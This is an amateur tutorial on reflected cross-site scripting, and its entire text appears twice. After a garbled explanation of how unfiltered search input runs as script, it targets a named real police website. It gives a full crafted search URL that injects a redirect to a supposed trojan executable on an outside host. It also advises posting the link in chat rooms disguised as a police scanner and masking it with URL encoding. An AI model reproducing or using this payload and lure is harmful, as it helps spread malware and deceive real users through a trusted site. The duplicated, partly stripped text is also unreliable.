Intro:In this tutorial i will show youhow XSS works and how you can use it..
What is an XSS ?An XSS is an vurnability in an web-applicationthat can cause hackers to execute scripts on the client side...
Dangers of XSS...these day's browser keep some of the dangers of XSS outside..Like.. if an script want to write/edit edit files on the computer it needs extra permission from the user...or by some browsers it just get blocked...
How does XSS Work ?
if an user posts something to an webpage ( ex: http://search.live.com/ )the search engine shows what KeyWord the user typed..
Example:
The keyword given was: www.djoedjoe.com
You see that the search engine outputs the keyword again.
If an web-aplication processes the input from the user
without filtering, for example the user input: xss-tutorial
it will be like this in the source:........
Your keyword was: xss-tutotorial
In this case its seems very normal:
But what if the user input was:
it would be in the source like this:.....
Your keyword was:
this doesnt look very normal on the screen:
So what happend, is that the user input was actually a javascript.. that didnt got filter by the web-application.
Well this happens when an web-application ( like an search engine ) doesnt filter the user-input: 1. As keyword you enter an javascript..
2. the search engine checks if youre keywords matches the records, and then builds an page with the results..
3. the SearchEngine builds the rest of the page ( like ads and stuff ).. and s directly ( without filtering it first ) puts your keyword in the page too...
4. The webserver sends the page ( source ) to you...
5. Your browser reads every line/code from the source and shows it on the screen.
6. finally the browser also reads your javascript input .. & executes it.
=======================
How to find and use xss ?
=======================
XSS is dangrous because people get mislead easily..There are scripts that like. steal user-cookies ...hackers can abuse those stolen cookies..Im not going further on cookie-stealing, but i will giveyou an other example on how to abuse xss vurnability's...Like i said, you can mislead people by using those XSS Vurnability's...You can someone to make download something,By using an XSS on an trusted website..
Example:
You won't expect that downloading something from http://www.lapdonline.org/, would be somekind of malware ( trojan or something )..Well lets see if we can change that...We gonna search for an XSS vurnabiity on that website...Goto.. http://www.lapdonline.org/You will see an search functions under the banner..Lets see if the search engine filters our keyword...Enter as keyword:
Click then on GO..Yeahh, it worked !
=============================
Well how can we abuse this ??
=============================
we can put javascripts as keywords..And most people would suspect hat website of something bad...So its good enough to mislead people with it..We could enter an javascript that would redirect people to an trojan.. ( in this im not using an trojan )..well if that is wha we want to do..We will using this little script then:
go back to:
http://www.lapdonline.org/And enter that script in the search engine and click on go...
ohk at there.. we have been redirected to our file...This file named: policescanner.exe , could be an trojanYou could go in to an chat room or communityand say its an police scanner !You would just gave the link in your browser then, http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://www.technoplex.co.cc/policescanner.exe%22;%3C/script%3E
People mostly read the first part of the link, before clicking on it... in this case: http://www.lapdonline.org/
Well, they gonna think its an LAPD website, and your talking about an police scanner, so why not download it ?Maybe when someone looks closely and he might see the link to your trojan...
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exeand they will notice its fake...but no worry's, with an URL-Encoder you can 'mask' that ...
What is an XSS ?An XSS is an vurnability in an web-applicationthat can cause hackers to execute scripts on the client side...
Dangers of XSS...these day's browser keep some of the dangers of XSS outside..Like.. if an script want to write/edit edit files on the computer it needs extra permission from the user...or by some browsers it just get blocked...
How does XSS Work ?
if an user posts something to an webpage ( ex: http://search.live.com/ )the search engine shows what KeyWord the user typed..
Example:
The keyword given was: www.djoedjoe.com
You see that the search engine outputs the keyword again.
If an web-aplication processes the input from the user
without filtering, for example the user input: xss-tutorial
it will be like this in the source:........
Your keyword was: xss-tutotorial
In this case its seems very normal:
But what if the user input was:
it would be in the source like this:.....
Your keyword was:
this doesnt look very normal on the screen:
So what happend, is that the user input was actually a javascript.. that didnt got filter by the web-application.
Well this happens when an web-application ( like an search engine ) doesnt filter the user-input: 1. As keyword you enter an javascript..
2. the search engine checks if youre keywords matches the records, and then builds an page with the results..
3. the SearchEngine builds the rest of the page ( like ads and stuff ).. and s directly ( without filtering it first ) puts your keyword in the page too...
4. The webserver sends the page ( source ) to you...
5. Your browser reads every line/code from the source and shows it on the screen.
6. finally the browser also reads your javascript input .. & executes it.
=======================
How to find and use xss ?
=======================
XSS is dangrous because people get mislead easily..There are scripts that like. steal user-cookies ...hackers can abuse those stolen cookies..Im not going further on cookie-stealing, but i will giveyou an other example on how to abuse xss vurnability's...Like i said, you can mislead people by using those XSS Vurnability's...You can someone to make download something,By using an XSS on an trusted website..
Example:
You won't expect that downloading something from http://www.lapdonline.org/, would be somekind of malware ( trojan or something )..Well lets see if we can change that...We gonna search for an XSS vurnabiity on that website...Goto.. http://www.lapdonline.org/You will see an search functions under the banner..Lets see if the search engine filters our keyword...Enter as keyword:
Click then on GO..Yeahh, it worked !
=============================
Well how can we abuse this ??
=============================
we can put javascripts as keywords..And most people would suspect hat website of something bad...So its good enough to mislead people with it..We could enter an javascript that would redirect people to an trojan.. ( in this im not using an trojan )..well if that is wha we want to do..We will using this little script then:
go back to:
http://www.lapdonline.org/And enter that script in the search engine and click on go...
ohk at there.. we have been redirected to our file...This file named: policescanner.exe , could be an trojanYou could go in to an chat room or communityand say its an police scanner !You would just gave the link in your browser then, http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cscript%3Edocument.location=%22http://www.technoplex.co.cc/policescanner.exe%22;%3C/script%3E
People mostly read the first part of the link, before clicking on it... in this case: http://www.lapdonline.org/
Well, they gonna think its an LAPD website, and your talking about an police scanner, so why not download it ?Maybe when someone looks closely and he might see the link to your trojan...
http://tuts.djoedjoe.com/basicxss/eng/policescanner.exeand they will notice its fake...but no worry's, with an URL-Encoder you can 'mask' that ...